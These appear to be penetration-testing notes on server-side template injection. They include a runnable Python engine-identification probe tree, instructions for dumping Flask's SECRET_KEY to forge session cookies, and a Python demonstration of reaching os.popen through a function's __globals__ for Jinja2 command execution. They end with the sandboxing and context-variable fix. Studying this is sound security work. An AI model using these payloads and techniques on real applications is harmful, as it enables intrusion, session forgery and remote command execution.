SSTI
https://github.com/payloadbox/ssti-payloads
Step 1: Find an injection point (a form field, a URL parameter, a header or cookie value that is reflected into a page) and send basic probe payloads to see whether the application evaluates them instead of echoing them back. A probe is only a hit when the computed value appears and the raw payload does not.
Step 2: If it does, determine which template engine is running, because the exploit payloads are engine specific.
Basic identification:
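The probe-and-narrow procedure from the two steps above, written out as an added example (not code from the original notes). `render` stands for the injection point: a callable that submits one payload and returns the response body. `fake_target` is a constructed stand-in that answers the way a Jinja2-, Twig- or non-vulnerable endpoint would, so the tree can be run offline; on a real engagement it would wrap an HTTP request. The distinguishing behaviours (Jinja2 repeats a string multiplied by an integer, Twig coerces it to a number) are the standard ones from the decision tree; the large product is chosen so a hit is not confused with a number already on the page.

```python
import re
from typing import Callable

# Constructed probe values: a product unlikely to occur in a page by chance.
A, B = 1361, 1327
PRODUCT = str(A * B)  # "1806047"

Render = Callable[[str], str]  # injection point: payload in, response body out


def _evaluates(render: Render, payload: str, expected: str) -> bool:
    """True only when the engine computed the expression: the expected value
    is in the response AND the raw payload is not echoed back verbatim."""
    body = render(payload)
    return expected in body and payload not in body


def identify(render: Render) -> str:
    """Classic SSTI decision tree. Returns an engine-family label, or
    'not vulnerable' when none of the probe syntaxes is evaluated."""
    # {{ }} family: Jinja2, Twig, Nunjucks ...
    if _evaluates(render, "{{%d*%d}}" % (A, B), PRODUCT):
        # Jinja2 (Python semantics) repeats the string, Twig coerces it.
        if _evaluates(render, "{{7*'7'}}", "7777777"):
            return "jinja2"
        if _evaluates(render, "{{7*'7'}}", "49"):
            return "twig"
        return "unknown {{ }} engine"
    # ${ } family: FreeMarker, Mako ...
    if _evaluates(render, "${%d*%d}" % (A, B), PRODUCT):
        return "${ } engine (e.g. FreeMarker, Mako)"
    # <%= %> family: ERB, EJS ...
    if _evaluates(render, "<%%=%d*%d%%>" % (A, B), PRODUCT):
        return "<%= %> engine (e.g. ERB, EJS)"
    return "not vulnerable"


# --- constructed stand-in for a target, so the example runs offline ---------
_EXPR = re.compile(r"\{\{(\d+)\*(?:(\d+)|'(\d+)')\}\}")


def fake_target(engine: str) -> Render:
    """Mimics only the two probe shapes used above for 'jinja2' and 'twig';
    any other engine label simply reflects the payload (not vulnerable)."""
    def render(payload: str) -> str:
        def evaluate(m: "re.Match") -> str:
            left, num, text = int(m.group(1)), m.group(2), m.group(3)
            if num is not None:
                return str(left * int(num))
            if engine == "jinja2":          # int * str -> string repetition
                return text * left
            return str(left * int(text))    # Twig: numeric coercion
        body = _EXPR.sub(evaluate, payload) if engine in ("jinja2", "twig") else payload
        return "<html><body>Hello " + body + "</body></html>"
    return render


if __name__ == "__main__":
    for label in ("jinja2", "twig", "reflect"):
        print(label, "->", identify(fake_target(label)))
```

The `payload not in body` check matters: a page that HTML-escapes and echoes `{{1361*1327}}` is not vulnerable, and a page that happens to contain `49` would otherwise look like a hit for the classic `{{7*7}}` probe.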
Exploit
Jinja2
Render the config object to dump all Flask configuration variables. This reveals SECRET_KEY if it is set, which is enough to forge signed session cookies.
Jinja injection without <class 'object'>
Besides the common path that walks up to <class 'object'> and enumerates its subclasses, there is another way to reach RCE that does not use that class.
If you can reach any function from the global objects available in the template, you can read its __globals__ and from there __builtins__, and then RCE is straightforward.
Enumerate the attributes of request, config and any other interesting global object you can reach to find plain functions or methods (reading the object's __class__.__dict__ is the usual way).
Once you have found one, its __globals__ holds the module globals of the module that defined the function, including __builtins__ with __import__, open and the rest. Bound methods delegate attribute access to the underlying function, so the same attribute works on a method.
Caveat: this works in the default Jinja2 environment that Flask's render_template_string uses; Jinja2's SandboxedEnvironment rejects attribute names that start with an underscore, so both this path and the <class 'object'> path fail there. The real fix is never to build a template from user input; pass user data in as a context variable instead.
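The two steps above (find a function on a reachable object, then read its __globals__ to recover the builtins) in plain Python, as an added example that is not code from the original notes. It assumes `victim` is any object the template context exposes; a constructed stdlib object (argparse.ArgumentParser) stands in for Flask's request so the code runs without Flask, and the walk is the same one a payload performs through Jinja2 attribute access (the method usually cited on Flask's request class is _load_form_data).

```python
import argparse
import types


def find_functions(obj) -> dict:
    """Plain functions reachable through obj.__class__ (and its bases).
    This is what reading obj.__class__.__dict__ in a template shows you."""
    found = {}
    for cls in type(obj).__mro__:
        for name, value in vars(cls).items():
            if isinstance(value, types.FunctionType):
                found.setdefault(name, value)
    return found


def recover_builtins(obj) -> dict:
    """Pick any function and read its __globals__['__builtins__'].
    In imported modules that entry is a dict; in __main__ it is the
    builtins module, so normalise both to a dict."""
    functions = find_functions(obj)
    if not functions:
        raise LookupError("no plain function reachable from this object")
    fn = next(iter(functions.values()))
    b = fn.__globals__["__builtins__"]
    return b if isinstance(b, dict) else vars(b)


def execute(obj, cmd: str) -> str:
    """With __import__ in hand the rest is ordinary Python: import os and
    run a command. Same shape as the template payload, minus the braces."""
    builtins = recover_builtins(obj)
    os_module = builtins["__import__"]("os")
    return os_module.popen(cmd).read().strip()


if __name__ == "__main__":
    # Constructed victim: stands in for `request` in the template context.
    victim = argparse.ArgumentParser()
    print("functions:", sorted(find_functions(victim))[:5], "...")
    print("have __import__:", "__import__" in recover_builtins(victim))
    print("command output:", execute(victim, "echo ssti-demo"))
```

Any object whose class defines at least one Python-level function works; this is why the sandboxed environment's refusal of underscore-prefixed attributes is what actually blocks the path, not the choice of object.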
Reference for the engine detection decision tree and per-engine payloads:
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection